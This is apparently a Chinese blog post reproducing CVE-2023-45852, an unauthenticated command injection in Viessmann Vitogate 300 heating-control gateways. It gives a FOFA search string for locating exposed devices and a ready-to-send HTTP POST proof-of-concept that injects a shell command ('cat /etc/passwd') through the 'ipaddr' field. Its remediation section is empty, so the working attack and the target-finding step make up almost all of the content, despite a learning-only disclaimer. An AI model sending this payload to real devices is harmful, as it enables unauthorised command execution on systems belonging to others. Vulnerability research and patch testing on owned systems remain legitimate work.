【漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)

漏洞描述

Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞,通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。
【漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)_第1张图片

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:"Vitogate 300"

漏洞复现

利用如下POC进行POST请求查看passwd文件

POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 76
Content-Type: application/json


{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

【漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)_第2张图片

修复方案

你可能感兴趣的:(网络安全,web安全,渗透测试,漏洞复现,漏洞复现,渗透测试)